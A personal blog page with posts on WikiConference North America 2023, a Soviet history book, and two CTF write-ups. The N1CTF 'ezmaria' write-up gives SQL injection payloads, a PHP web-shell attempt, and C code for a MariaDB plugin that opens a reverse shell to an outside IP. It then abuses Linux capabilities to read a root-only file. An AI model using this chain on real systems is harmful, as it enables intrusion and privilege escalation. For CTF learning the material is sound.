Tuesday, November 14, 2023

WikiConference North America 2023 (part 1)

 


 This weekend I attended WikiConference North America. I decided to go somewhat at the last moment, but am really glad I did. This is the first non-technical Wikimedia community conference I have attended since COVID and it was great to hear what the Wikipedia community has been up to.

I was on a bit of a budget, so i decided to get a cheaper hotel that was about an hour away by public transit from the venue. I don't think I'll do that again. Getting back and forth was really smooth - Toronto has great transit. However it meant an extra hour at the end of the day to get back, and waking up an hour earlier to get there on time, which really added up. By the end I was pretty tired and much rather would have had an extra 2 hours of sleep (or an extra 2 hours chatting with people).

Compared to previous iterations of this conference, there was a much heavier focus on on-wiki governance, power users and "lower-case s" Wikipedia (not Wikimedia) strategy. I found this quite refreshing and interesting since I mostly do MediaWiki dev stuff and do not hear about the internal workings of Wikipedia as much. Previous versions of this conference focused too much (imho) on talks about outreach which while important were often a bit repetitive. The different focus was much more interesting to me.

Key Take-aways

My key take away from this conference was that there is a lot of nervousness about the future. Especially:

  • Wikipedia's power-user demographics curve is shifting in a concerning way. Particularly around admin promotion.
  • AI is changing the way we consume knowledge, potentially cutting Wikipedia out, and this is scary
  • A fear that the world is not as it once was and the conditions that created Wikipedia are no longer present. As they keynote speaker Selena Deckelmann phrased it, "Is Wikipedia a one-generation marvel?"

However I don't want to overstate this. Its unclear to me how pervasive this view is. Lots of presenters presented views of that form, but does the average Wikipedian agree? If so, is it more an intellectual agreement, or are people actually nervous? I am unsure. My read on it is that people were vaguely nervous about these things, but by no means was anyone panicking about them. Honestly though, I don't really know. However, I think some of these concerns are undercut by there being a long history of people worried about similar things and yet Wikipedia has endured. Before admin demographics people were panicking about new user retention. Before AI changing the way we consume content, it was mobile (A threat which I think is actually a much bigger deal).

Admin demographics

That said, I never quite realized the scale of admin demographic crisis. People always talk about there being less admin promotions now than in the past, but i did not realize until it was pointed out that it is not just a little bit less but allegedly 50 times less. There is no doubt that a good portion of the admin base are people who started a decade (or 2) ago, and new user admins are fewer and further between.

A particular thing that struck me as related to this at the conference, is how the definition of "young" Wikipedian seems to be getting older. Occasionally I would hear people talk about someone who is in high school as being a young Wikipedian, with the implication that this is somewhat unusual. However when you talk to people who have been Wikipedians for a long time, often they say they were teenagers when they started. It seems like Wikipedians being teenagers was a really common thing early in the project, but is now becoming more rare.

Ultimately though, I suspect the problem will solve itself with time. As more and more admins retire as time goes on, eventually work load on the remaining will increase until the mop will be handed out more readily out of necessity. I can't help but be reminded of all the panic over new user retention, until eventually people basically decided that it didn't really matter.

AI

As far as AI goes, hating AI seems to be a little bit of a fad right now. I generally think it is overblown. In the Wikipedia context, this seems to come down to three things:

  • Deepfakes and other media manipulation to make it harder to have reliable sources (Mis/Dis-information)
  • Using AI to generate articles that get posted, but perhaps are not properly fact checked or otherwise poor quality in ways that aren't immediately obvious or in ways existing community practice is not as of yet well prepared to handle
  • Voice assistants (alexa), LLMs (ChatGPT) and other knowledge distributions methods that use Wikipedia data but cut Wikipedia out of the loop. (A continuation of the concern that started with google knowledge graph)

I think by and large it is the third point that was the most concerning to people at the conference although all 3 were discussed at various points. The third point is also unique to Wikipedia.

There seemed to be two causes of concern for the third point. First there was worry over lack of attribution and a feeling that large silicon valley companies are exploitatively profiting off the labor of Wikipedians. Second there is concern that by Wikipedia being cut out of the loop we lose the ability to recruit people when there is no edit button and maybe even lose brand awareness. While totally unstated, I imagine the inability to show fundraising banners to users consuming via such systems probably is on the mind of the fundraising department of WMF.

My initial reaction to this is probably one of disagreement with the underlying moral basis. The goal was always to collect the world's knowledge for others to freely use. The free knowledge movement literally has free in the name. The knowledge has been collected and now other people are using it in interesting, useful and unexpected ways. Who are we to tell people what they can and cannot do with it?

This is the sort of statement that is very ideologically based. People come to Wikimedia for a variety of reasons, we are not a monolith. I imagine that people probably either agree with this view or disagree with it, and no amount of argument is going to change anyone's mind about it. Of course a major sticking point here is arguably ChatGPT is not complying with our license and lack of attribution is a reasonable concern.

The more pragmatic concerns are interesting though. The project needs new blood to continue over the long term, and if we are cut out of the distribution loop, how do we recruit. I honestly don't know, but I'd like to see actual data confirming the threat before I get too worried.

The reason I say that, is that I don't think voice assistants and LLMs are going to replace Wikipedia. They may replace Wikipedia for certain use cases but not all use cases, and especially not the use case that our recruitment base is.

Voice assistants generally are good for quick fact questions. "Who is the prime minister of Canada?" type questions. The type of stuff that has a one sentence answer and is probably stored on Wikidata. LLMs are somewhat longer form, but still best for information that can be summarized in a few paragraphs, maybe a page at most and has a relatively objective "right" answer (From what I hear. I haven't actually used ChatGPT). Complex nuanced topics are not well served by these systems. Want to know the historical context that lead to the current flare up in the middle east? I don't think LLMs will give you what you want.

Now think about the average Wikipedia editor. Are they interested in one paragraphs answers? I don't know for sure, but I would posit that they tend to be more interested in the larger nuanced story. Yes other distribution models may threaten our ability to recruit from users using them, but I don't think that is the target audience we would want to focus recruitment on anyways. I suppose time will tell. AI might just be a fad in the end.

Conclusion

I had a great time. It was awesome to see old friends but also meet plenty of new people I did not know. I learned quite a bit, especially about Wikipedia governance. In many ways, it is one of the more surprising wiki conferences I've been too, as it contained quite a bit of content that was new to me. I plan to write a second blog post about my more raw unfiltered thoughts on specific presentations. (Edit: I never did make a second post, and i guess its kind of late enough at this point that i probably won't, so nevermind about that)

Monday, October 23, 2023

CTF Writeup N1CTF 2023: ezmaria

 This weekend I participated in N1CTF. Challenges were quite hard, and other than give-away questions, I only managed to get one: ezmaria. Despite that, I still ended up in 35th place, which I think is a testament to how challenging some of these problems were. Certainly an improvement from 2021 where I came 98th. Maybe next year I'll be able to solve a problem that doesn't have "ez" in the name.



The problem

We are given a website with a clear SQL injection. It takes an id parameter, does a query, and outputs the result.

First things first, lets see what we are dealing with: 0 UNION ALL select 1, version(); reveals that this is 10.5.19-MariaDB+deb11u2. A bit of an old version, but i didn't see any immediately useful CVEs. (MariaDB is a fork of MySQL so the name "mysql" still appears all over the place even though this is MariaDB and not MySQL)

The contest organizers provided a hint: "get shell and run getcap", so presumably the flag is not in the database. Nonetheless, i did poke around information_schema to check what was in the database. There was a fake flag but no real ones.

The text of the website strongly implied that it was written in PHP, so continuing on the trend of ruling out the easy things, I tried the traditional 0 UNION ALL select 1, "<?php passthru( $_REQUEST['c'] ); ?>" INTO OUTFILE "/var/www/html/foo.php";

This gave an error message. It appears that OUTFILE triggered some sort of filter. Trying again with DUMPFILE instead bypasses the filter. However instead MariaDB gives us an error message about file system permissions. No dice. It is interesting though that I got far enough for it to be a filesystem permission error. This implies that our MariaDB user has FILE or SUPER permissions and that secure_file_priv is disabled.

The next obvious step is to try and learn a little bit more about the environment. MariaDB supports a LOAD_FILE to read files. First I tried to read environment variables out of /proc, but that didn't work. The next obvious thing was to fetch the source code of the script generating this page. Since it is implied php, /var/www/html/index.php is a good guess for the path: 0 UNION ALL SELECT load_file( "/var/www/html/index.php" ),1

Index.php


Finally a step forward. This returned the php script in question, which had several interesting things in it.
 
First off 
$servername = "127.0.0.1";
$username = "root";
$password = "123456";
$conn = new mysqli($servername, $username, $password, $dbn);

Always good to know the DB credentials. While not critical, they do become somewhat useful later. Additionally, the fact we are running as the root database user opens up several avenues of attack I wouldn't otherwise have.

// avoid attack
if (preg_match("/(master|change|outfile|slave|start|status|insert|delete|drop|execute|function|return|alter|global|immediate)/is", $_REQUEST["id"])){
    die("你就不能绕一下喵");
}

Good to know what is and isn't being filtered if I need to evade the filter later, although to be honest this didn't really come up when solving the problem.

$result = $conn->multi_query($cmd);

This is really interesting. Normally in PHP when using mysqli, you would use $conn->query(), not ->multi_query(). Multi_query supports stacked queries, which means I am not just limited to UNION ALL-ing things, but can use a semi-colon to add additional full queries including verbs other than SELECT.

The script unfortunately will not output the results or errors of these other stacked queries only the first query, which significantly slowed down solving this problem, but more on that later.

Last of all, is the secret command:
//for n1ctf ezmariadb secret cmd

if ($_REQUEST["secret"] === "lolita_love_you_forever"){
    header("Content-Type: text/plain");
    echo "\\n\\n`ps -ef` result\\n\\n";
    system("ps -ef");
    echo "\\n\\n`ls -l /` result\\n\\n";
    system("ls -l /");
    echo "\\n\\n`ls -l /var/www/html/` result\\n\\n";
    system("ls -l /var/www/html/");
    echo "\\n\\n`find /mysql` result\\n\\n";
    system("find /mysql");
    die("can you get shell?");
}


While that looks promising, lets do it!

The secret command

For space, I am going to omit some of the less important parts:

`ps -ef` result

UID          PID    PPID  C STIME TTY          TIME CMD
[..]
root          15      13  0 14:06 ?        00:00:00 su mysql -c mariadbd --skip-grant-tables --secure-file-priv='' --datadir=/mysql/data --plugin_dir=/mysql/plugin --user=mysql
mysql         20      15  0 14:06 ?        00:00:00 mariadbd --skip-grant-tables --secure-file-priv= --datadir=/mysql/data --plugin_dir=/mysql/plugin --user=mysql
[..]


`ls -l /` result

total 96
[..]
-rw-------   1 root  root    32 Oct 22 14:06 flag
-rwxr-xr-x   1 root  root    84 Sep 18 06:10 flag.sh
drwxr-xr-x   1 mysql mysql 4096 Oct 17 22:35 mysql
-rwx------   1 root  root   160 Oct 17 22:35 mysql.sh
[..]


`find /mysql` result

/mysql
/mysql/plugin
/mysql/data
/mysql/data/ibtmp1
[..]
can you get shell?


So some interesting things here.
 
Presumably the only-root-readable flag file is our target. MariaDB is running as "mysql", thus would not be able to read it. However a hint was given out to run getcap, so presumably capabilities are in play somehow. However this output does not give us any indication as to how, so I guess we'll have to figure that out later.

I was immediately curious about the flag.sh file, but it turns out to be just a script that creates the flag file and removes the flag from the environment variables.
 
An interesting thing to note here, is that mariadbd is run with some non-standard options --skip-grant-tables --secure-file-priv= --datadir=/mysql/data --plugin_dir=/mysql/plugin. We already discovered that secure-file-priv had been disabled, but it seems especially interesting when combined with setting the plugin_dir to a non-standard location that appears to be writable by mariadb. --skip-grant-tables means that MariaDB does not get user information from the internal "mysql" database. Normally in MariaDB there is a special database named mysql that stores internal information including what rights various users have - this option says not to use that database for user rights. The impact of this will become more clear later.
 
We are asked "can you get shell?", and it seems like that is a natural place to focus next.

MariaDB plugins

Setting the plugin directory to a non-standard writable directory is a pretty big hint that plugins are in play, so how do plugins work in MariaDB?

There's a variety of plugin types in MariaDB that do different things. They can add new authentication methods, new SQL functions, change the way the server operates, etc. There's also a concept of server-side vs client-side plugins. A client-side plugin is used with custom authentication schemes from programs like the mariadb command line client. Generally plugins are dynamically loaded compiled shared object (.so or .dll) files

For server side plugins, they can be enabled in config files, or dynamically via the INSTALL PLUGIN plugin_name SONAME "libwhatever.so"; SQL command. MariaDB then uses dlopen() to load the specified so file.

With all that in mind, a plan forms for how to get shell. It is still unclear where to go from there, since our shell will be running as the mysql user which won't be able to read the flag. The hope is that once we have a shell we can investigate the server more thoroughly and find some way to escalate privileges. In any case, the plan is: Write a plugin that spawns a reverse shell, upload the plugin via the SQL injection using INTO DUMPFILE, enable the plugin and catch the shell with netcat.

Writing a plugin

MariaDB already comes with a lot of plugins, so instead of writing one from scratch I decided to just modify an existing one.

We can download the sources for the debian version of mariadb at https://salsa.debian.org/mariadb-team/mariadb-10.5.git.

I could implement the needed commands in the plugin initialization function, the way a proper plugin would, but it seemed easier to just add a constructor function. This will get executed as soon as MariaDB calls dlopen(), so even if something is wrong with the plugin and MariaDB refuses to load it - as long as it can be linked in, my code will still run.

With that in mind, I added the following to the middle of plugin/daemon_example/daemon_example.cc:
 
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
 
__attribute__((constructor))
void shell(void){
  if (!fork() ) {
    int port = 8080;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("167.172.208.75");

    connect(sockt, (struct sockaddr *) &revsockaddr,
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, {NULL} );
  }     
}


The __attribute__((constructor)) tells gcc that this function should run immediately upon dlopen(). It then opens a connection to 167.172.208.75 (my IP address) on port 8080, connecting stdin, stdout, and stderr to the opened socket, and executing /bin/sh thus making a remotely accessible shell. On my own computer I will be running nc -v -l -p 8080 waiting for the connection. Once it connects I will have a shell to the remote server.

I run cmake and make and wait for things to compile. Eventually they do, and we have a nice shiny libdaemon_example.so.
 

Installing the plugin

I convert this to base64, and prepare in a file named data containing: 0 UNION ALL SELECT from_base64( "...libdaemon_example.so as base64" ) INTO DUMPFILE "/mysql/plugin/libdaemon_example.so"; and upload it via curl 'http://urlOfChallenge' --data-urlencode id@data.
 
We can confirm it got there safely, by doing a query: 0 UNION ALL md5(load_file( "/mysql/plugin/libdaemon_example.so" ) ); and verifying the hash matches.

The hashes match, so its time to put this into action. I give the SQL: 0; INSTALL PLUGIN daemon_example SONAME "libdaemon_example.so";

And wait in eager anticipation for netcat to report a connection, but the connection never comes.

----

This is where things would be much simpler if our sql injection actually reported errors from stacked queries. Without that we just have to guess what went wrong, and guess I did. Figuring out why it didn't work took hours.

Initially when testing locally it worked totally fine, using the same version of MariaDB with the same options. I even tried on a different version of MariaDB I had installed, where MariaDB refused to load the plugin due to an API mismatch, but nonetheless my code still ran because it was in a constructor function.
 
After bashing my head against it for several hours,I eventually noticed that my file structure looked different than what it did on the server. On my local computer there was a "mysql" database (In the sense of a collection of tables, not in the sense of the program), where the server only had the ctf and information_schema databases. When compiling mariadb locally, I had run an install script that had created the mysql database automatically.

Getting rid of the mysql database, I was able to reproduce the problem locally, and got a helpful error message. Turns out, INSTALL PLUGIN uses the mysql.plugins table internally and refuses to run if it isn't present. I dug around the MariaDB sources, and found scripts/mysql_system_tables.sql which had a definition for this table.

This also explains why the --skip-grants-table option was set. MariaDB will abort if the mysql.global_priv table is not present without this option. Hence the option is needed for MariaDB to even run in this setup.

With that in mind, i gave the following commands to the server to create the missing plugins table:

 0;
 CREATE database mysql;
 USE mysql;
 CREATE TABLE IF NOT EXISTS plugin ( name varchar(64) DEFAULT '' NOT NULL, dl varchar(128) DEFAULT '' NOT NULL, PRIMARY KEY (name) ) engine=Aria transactional=1 CHARACTER SET utf8 COLLATE utf8_general_ci comment='MySQL plugins';

Now with the mysql.plugin existing, lets try this again:

0; INSTALL PLUGIN daemon_example SONAME "libdaemon_example.so";
 
I then look over to my netcat listener:
 
Listening on 0.0.0.0 8080
Connection received on 116.62.19.175 26740
pwd
/mysql/data
 
We have shell!

Exploring the system

Alright, we're in. Now what?

The contest organizers gave a hint saying to run getcap, so that seems like a good place to start:

getcap -r / 2> /dev/null
/usr/bin/mariadb cap_setfcap+ep

Well that is something. Apparently the MariaDB command line client (not the server) has the setfcap capability set.

What are capabilities anyhow?

While I have certainly heard of linux capabilities before, I must admit I wasn't very familiar with them. So what are they?

Capabilities are basically a fine-grained version of "root". Each process (thread technically) has a certain set of capabilities, which grant it rights it wouldn't normally otherwise have.

For example, if you are running a web server that needs to listen on port 80, instead of giving it full root rights, you could give the process CAP_NET_BIND_SERVICE capabilities, which allows it to bind to port 80 even if it is not root. Traditionally you need root to bind to any port below 1024.

There are a variety of capabilities that divide up the traditional things that root gives you, e.g. CAP_CHOWN to change file owners or CAP_KILL to send signals and so.

Sounds simple enough, but the rules on how capabilities are transferred between processes are actually quite complex. Personally I found most of the docs online a bit confusing, so here is my attempt at explaining:
 
Essentially, each running thread has 5 sets of capabilities, and each executable program has 2 sets + 1 special bit in the filesystem. What capabilities a new process will actually have and which ones are turned on is the result of the interplay between all these different sets.

The different capabilities associated with a thread are as follows (You can view the values for a specific running process in /proc/XXX/status):
  • Effective: These are the capabilities that are actually currently used for the thread when doing permission checks. You can think of these as the capabilities that are currently "on".
  • Permitted: These are the capabilities that the thread can give itself. In essence, these are the capabilities that the thread can turn on, but may or may not currently be "on" (effective). If a capability is in this set but not the effective set, it won't be used for permission checks at present but a thread is capable of enabling it for permission checks later on with cap_set_proc().
  • Inheritable: These are the capabilities that can potentially be inherited by new processes after doing execve. However the new process will only get these capabilities if the file being executed has also been marked as inheriting the same capability.
  • Ambient: This is like a super-version of inheritable. These capabilities will always be given to child processes after execve even if the program is not explicitly marked as being able to inherit them. It will inherit them into both its effective set and its permitted set, so they become "on" by default.
  • Bounding: This is more like a max limit. Anything not in this list can be never given out or gained. In a normal system, you probably have all capabilities in this set, but if you wanted to setup a restricted system some capabilities might be removed from here to ensure it is impossible to ever gain them back.
In addition to threads having capabilities, executable files on the file system also can have capabilities. This is somewhat akin to how SUID works (although unlike SUID this is not marked in the output of ls in any way). Files have 2 sets of capabilities and 1 special flag. These can be viewed using getcap:
  • Permitted: These are the capabilities that the executable will get when being executed. The process will get all of these capabilities (except those missing from the bounding set) even if the parent process does not have these capabilities. Its important to remember that the file permitted set is a different concept from the permitted set of a running process.
  • Inheritable: These are the capabilities the executable will get if the running parent process also has them in its inheritable set.
  • Effective flag: This is just a flag not a set of capabilities. This controls how the new process will gain capabilities. If it is off, then the new capabilities will go in the thread's permitted set and won't automatically be enabled until the thread itself enables them by adding to its own effective set. If this flag is on, then the new capabilities for the thread go in the thread's effective set automatically (i.e. they start in an "on" state).
Generally capabilities for files are displayed as capability_name=eip where e, i and p, denote what file set the capability is in (e is a flag so has to be on for all or none of the capabilities).
 
To summarize file system capabilities: "permitted" are the capabilities the process automatically gets when started regardless of parent process, "inherited" are the ones that they can potentially gain from the parent process but generally won't get if the parent process doesn't have them as inheritable, and effective controls if the capabilities are on by default or if the process has to make a syscall before they become turned on.

This is a bit complex, so lets consider an example:

Consider an executable file named foo that has cap_chown in its (filesystem) inherited set and cap_kill in its (filesystem) permitted set.
 
 sudo setcap cap_chown=+i\ cap_kill=+p ./foo
 
This means when we execute it, the foo process will definitely have cap_chown in its permitted set regardless  (As long as it is in the bounding set of the parent process). It might have cap_kill in its permitted set, but only if the parent process had cap_kill in its inheritable set. However its effective set will be empty (assuming no ambient capabilities are in play) until foo calls cap_set_proc(). If instead the e flag was set, then these capabilities would immediately be in the effective set without having to call cap_set_proc. Regardless if the foo process execve's some other child process where the file being executed is not marked as having any capabilities, the child would not inherit any of these capabilities foo has.


I've simplified this somewhat, see capabilities(7) man page for the full details.

MariaDB's capabilities

With that in mind, lets get back the problem at hand.

/usr/bin/mariadb cap_setfcap+ep

So MariaDB client has the setfcap capability. It is marked effective and permitted, which means the process will always get it and have it turned on by default when executed.

What is cap_setfcap? According to the manual, it allows the process to "Set arbitrary capabilities on a file."

Alright, that sounds useful. We want to read /flag despite not having permission to, so we can get mariadb with its CAP_SETFCAP capability to give another executable CAP_DAC_OVERRIDE capability. CAP_DAC_OVERRIDE means ignore file permissions, which would allow us to read any file.

My initial thought was to use the \! operator in the mariadb client, which lets you run shell commands, to run setcap(8). However it quickly became obvious that this wouldn't work. Since these permissions are only in the permitted & effective sets, they are not going to be inherited by the shell. Even if they were in the inheritable set, the shell would also have to have its executable marked as inheriting them in order for them to get inherited. Thus any subshell we make is unprivileged.

We need mariadb to execute our commands inside its process without running execve. The moment we execve we lose these capabilities.

Luckily, we can basically use the same trick as last time. In addition to mariadbd server supporting plugins, mariadb client also supports plugins. These are used for supporting custom authentication methods.
 
In MariaDB users can be authenticated via plugins. These server side authentication plugins can also have a client side requirement. If you try and log in as a user marked as using one of these plugins, the MariaDB client will automatically try and load (dlopen()) the relevant plugin when you try and log in as that user.

I again modified an existing one instead of trying to make my own. I decided to go with the dialog_example plugin from the MariaDB source code.

The server side part of this is from plugin/auth_examples/dialog_examples.c. The only change i made was to switch mysql_declare_plugin(dialog) to maria_declare_plugin(dialog) and set the stability to MariaDB_PLUGIN_MATURITY_STABLE (previously was 0). This was needed for mariadb to load the plugin in the default configuration. For clarity sake, although the name of the file is dialog_examples, the plugin's actual name is "two_questions".
 
After compiling, this generated a dialog_examples.so file which I uploaded to the server in the same fashion as before.

The client side part of the plugin is from libmariadb/plugins/auth/dialog.c. I added the following code:

#include <sys/capability.h>

#define handle_error(msg) \
   do { perror(msg); } while (0)

__attribute__((constructor))
void foo(void) {
        cap_t cap = cap_from_text( "cap_dac_override=epi" );
        if (cap == NULL) handle_error( "cap_from_text" );
        int res = cap_set_file( "/mysql/priv", cap );
        if (res != 0 ) handle_error( "cap_set_file" );
}


I also modified libmariadb/plugins/auth/CMakeLists.txt to add LIBRARIES cap to the REGISTER_PLUGIN directive to ensure it is linked with libcap.

This code esentially says, when the plugin is loaded, change the file capabilities of /mysql/priv to be cap_dac_override=epi (The i is probably unnecessary) thus allowing that program to read all files.

Compiling this made libmariadb/dialog.so which I uploaded to the server in the usual fashion. I also ran cp /bin/cat /mysql/priv to create the target for our plugin's capability modifications.

Setting things up to run the plugin

Now that these pieces are in place, we still have to convince the mariadb client to run our plugin. This comes down to trying to login to a mariadb server that needs the dialog/two_questions authorization method.
 
Normally this would be pretty easy, just run CREATE USER. However, that uses the grant table which is explicitly disabled.
 
At first I thought I was going to need to somehow get rid of this option on the server (Or i suppose just use a server on a different host. I didn't think of that at the time, but it probably would have been simpler). However, it turns out, even if the server starts without the grants table enabled you can enable it after the fact by running FLUSH PRIVILEGES.

Of course, these tables don't even exist, and the normal methods of adding entries (CREATE USER command) won't work until they do. Thus we have to manually create the table ourselves and make appropriate entries.
 
I log in using the mariadb command line client from the shell, as this is a lot easier than the sql-injection, and run the following commands to set this all up:
 
$ mariadb -u root -h 127.0.0.1 -p123456 -n

use mysql;
source /usr/share/mysql/mysql_system_tables.sql; -- install defaults for mysql db

INSTALL PLUGIN two_questions SONAME "dialog_examples.so";

INSERT INTO `global_priv` VALUES ('%','foo','{\"access\":1073741823,\"version_id\":100521,\"plugin\":\"two_questions\",\"authentication_string\":\"*00A51F3F48415C7D4E8908980D443C29C69B60C9\",\"password_last_changed\":1698000149}' );

INSERT INTO `global_priv` VALUES ('%','root','{\"access\":1073741823,\"version_id\":100521,\"plugin\":\"mysql_native_password\",\"authentication_string\":\"**6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9\",\"password_last_changed\":1698000149}' );

FLUSH PRIVILEGES;

 
In summary - I use the -n option to ensure mariadb flushes output since we don't have a pseudo-terminal, output will show up way too late if we don't do this.

I switch to the special mysql database which we created earlier. I already created the plugin table, but now I use SOURCE to create the other defaults for the mysql database. The mysql_system_tables.sql file was already present on the server. Then we insert a root user so we don't lose access, along with a foo user that uses our plugin.

Once we run FLUSH PRIVILEGES the new permissions take affect.

We now exit this and try logging in as foo, being sure to specify the appropriate plugin directory:
 
mysql -u foo2 -h 127.0.0.1 -n --plugin-dir=./plugin

The login doesn't work, but the plugin seems to have been executed. We had previously copied cat to /mysql/priv. If everything worked right, it should now be able to read any file on the system regardless of permissions:

/mysq/priv /flag
n1ctf{9a81f84cc7a3064e34800c35}


Success!

Conclusion

This was a fun problem. It taught me some of the internals of mysql and was a good excuse to finally commit the time to understanding how linux capabilities actually work.

The biggest challenge was figuring out the mysql.plugins table was needed to load a plugin. It probably would have been a lot less frustrating of a problem if error messages from stacked queries were actually output.

Nobody solved this problem until fairly late in the competition, but then about 8 teams did. The ctf organizers did release a hint that capabilities were involved. I wonder if many teams just didn't think to check for that as giving mariadb random capabilities it can't even use is not something that is likely to happen in real life, and capabilities are much less famous than SUID binaries.

Perhaps teams didn't get that far and simply saw from the output of the "secret" website command that some sort of unknown privilege escalation was necessary, figuring it might be some really involved thing and decided to work on other problems instead. In a way I'm kind of surprised that getcap wasn't output from the secret command to give people more of a direct hint - other more obvious things were after all. For that matter, it is kind of weird how ls doesn't mark files with capabilities in any special way like a SUID binary would be. I know its not stored in the traditional file mode, but nonetheless I found it a little surprising how hidden from traditional cli tools it is that capabilities are in play.


Thursday, October 12, 2023

Books: Everything Was Forever, Until It Was No More


Everything Was Forever, Until it Was No More by Alexei Yurchak.

This isn't the sort of book I would normally read. However with Ukraine and Russia in the news, I was finding myself wanting to know about the context of the conflict. So I went to the library and found this on the shelf. I picked it pretty at random from my library's collection of books on the USSR. It seemed to focus on how the collapse of the Soviet Union happened, which interested me - How does Russia go from being a super power to what it is now?

I don't know much about the Soviet Union beyond the high level summary of the cold war you get in high school history class. This book does not seem to be a text book summarizing various views so much as an academic book putting forth a specific view. Without knowing much about the subject, its difficult to judge how critically I should read it, but taking it face value this book nonetheless presents a fascinating point of view on what happened.

This was a challenging book to read. I'll do my best to summarize, although I'll probably do a bad job as I would probably need to do a second read through (at least) to really understand what this book presents.

The general premise seems to be that after the death of Stalin, the words and symbols of the regime became hyper formulaic and purely ritualistic, almost like a religion where everyone prays but nobody actually pays attention to what they are saying. This lead to the system feeling eternal, because it was always the same rituals and referencing the same historic speeches and ideas. However during perestroika where people were suddenly encouraged to improve the status quo in a more bottom up fashion and question old truisms, the system quickly collapsed as it became obvious the old symbols were just empty.


One of the main points of this book is that it is wrong to view the people of the soviet union as either against the soviet system or for the system. The situation is much more complex than such a black and white binary.

For example, the author talks a lot about the local leaders of the komsomol youth group. According to the author, they would often be quite ideologically motivated, believing in communism, but at the same time, not afraid to try and fake the more ideologically motivated busy work in order to do things that actually mattered. They didn't see this as contradictory but as a way to further socialism. Similarly western cultural imports were often not seen as opposing socialism but furthering it (but not always). Everything depended on context, and actions that might seem from the outside as being against soviet communism might seem to people in the system to be perfectly reasonable things to do and in accordance with the precepts of communism.

I found the discussions of how social relations manifested in these groups to be particularly interesting. According to the author, that while being a dissident or overly negative towards the soviet system was certainly frowned upon, so was being obnoxiously pro-soviet. What was more important was to be one of the group - a "normal" person and not someone who caused problems for other people. An antagonistic person causes problems for the group, regardless of which direction they are antagonistic in. People insisting the group follow every precept to the letter is just as annoying and disruptive as the people trying to tear down the system. The people who thrive are the ones who help each other out; attend silly meetings even if they think it is stupid because they know their friend will be judged by how many people show up and keep things running smoothly.

I can't help but feel that the author's description of this mirrors how office politics and cliques work in the workplaces of the capitalist world. Most places I've worked, and especially my experience at the MediaWiki open source project mirrors this. There is usually two power structures, the official one and the more unofficial one. The official hierarchy might give orders, but if you actually want to accomplish anything it pays to know who the right people are, and be on good terms with them so they identify you as one of "them". Being successful means enmeshing yourself inside the local social fabric; helping out other people where you can so that they will in turn. At MediaWiki this is turned up to 11 where some people are volunteer devs and some people are paid, with all sorts of different interest groups with varying, sometimes even contradictory, goals. The coming together of different conflicting groups can really exasperate us vs them dynamics and unofficial power structures. People might wax poetic about us vs them narratives being dangerous. They certainly aren't wrong, but at the same time it is always there to one extent or another. For better or worse, if you want to accomplish something, in any field, you need to get yourself to be an "us" and not a "them.

The author then goes into a discussion of more counter-cultural types (for lack of a better word). According to the author, these people were less opposed to the system, but decided to opt-out of it. The opposite wasn't to oppose the system but to just not care about the system. To just live their life without worrying, talking about or thinking about the system. I suppose its a little like the old saying, the opposite of love is not hate but indifference.

All this really set on its head all my preconceived notions of an authoritarian government that individual citizens were plotting to overthrow. Of course, I'm not sure how critically to read this book, no doubt there were many soviet dissidents in the traditional sense too. However I suppose this makes sense to me, for any given thing, some people will love it, some will hate it, most will just get on with their lives and do the best that they can while still inevitably affecting the system.


All in all this was a fascinating book that gave me a lot to think about. My summary was probably a poor attempt - there is much i don't quite understand.Regardless, this book was like a look into an alien world, where things are both really different but at the same time similarities shine through. In fact, I wish SF authors would make their aliens be a little less carbon copies of western societies. Obviously aliens would not be human at all, but at the very least we can make them not be culturally American.

In conclusion though, the central question this book is supposed to answer is: how did the soviet culture go from being eternal to collapsing almost overnight. I wish the book spelled the answer out a little more for me. I can see how everything in this book builds to and has bearing on that question, but i feel like I am missing a piece of the puzzle to make it all fit. I see how unique cultural practices, rituals, symbols and forms of messaging were very suddenly upended by perestroika, but I still feel I am in the dark on why the soviet system could not survive that or shift to something new. In fairness, perhaps I just need to read this a bit more closely, or be better versed in the context of the soviet system, which i know very little about.

Regardless, a fascinating read and window into another culture.

Monday, October 2, 2023

CTF Writeup: JUJUTSU KAISEN 1 & 2 @ MapleCTF-2023

This weekend I participated in MapleCTF, coming in 33rd overall. It was a great competition, with lots of interesting problems. I ended up spending most of my time on "JUJUTSU KAISEN 2". I didn't even have time to look at the two harder web problems. Overall I'm pretty proud of how I did in this competition, given that I was playing it solo and only 8 teams got the second Jujutsu problem.

I learned a lot, especially about ServiceWorkers, solving this problem. Without further ado, here's how I solved this challenge:

The Challenge

  • Points: 223 and 476 (for 1 and 2 respectively)
  • Number of solves: 26 and 8.
  • Links: 1, 2

We are given a zip file containing a docker-compose setup with a number of services. They are:

  • An nginx load balancer that connects to the varnish cache and provides TLS termination.
  • Varnish caching layer that can connect to either the front-end app or the GraphQL backend.
  • A front-end node.js app (jjk_app).
  • A backend graphQL server (jjk_db) that powers the front-end app.
  • A report bot (You give it a url, it then launches google chrome, logs into the app and navigates to a website of your choosing).
  • A redis server backend for the report bot.

The front-end app is behind a login. You cannot register new accounts and you do not know the password (But the report bot does log in before visiting your site). The front-end app has two endpoints of interest, both behind auth. A characters list powered by the GraphQL backend, including the flag, and a "/newchar" endpoint that allows you to upload an image that is saved to the server.

The flag is in the DB, so you either need to get it from the front-end endpoint the shows the query, or you need to get it from the DB more directly.

The first challenge

There were two versions of this challenge. This is usually means that there was some sort of unintended solution, which the second harder version has patched.

Since we have the source code for both challenges, you can see how they differ in case that gives us a hint.

$ diff -ur jjk1/ jjk2/

[omitting some inconsequential minor changes for space]

diff -ur jjk1/nginx/default.conf jjk2/nginx/default.conf
--- jjk1/nginx/default.conf    2023-09-29 16:23:05.000000000 -0700
+++ jjk2/nginx/default.conf    2023-09-30 01:30:28.000000000 -0700
@@ -1,7 +1,7 @@
 server {
         listen 443 ssl;
 
-        server_name localhost;
+        server_name jujutsu-kaisen-2.ctf.maplebacon.org;
         ssl_certificate /etc/nginx/ssl/nginx.crt;
         ssl_certificate_key /etc/nginx/ssl/nginx.key;
 
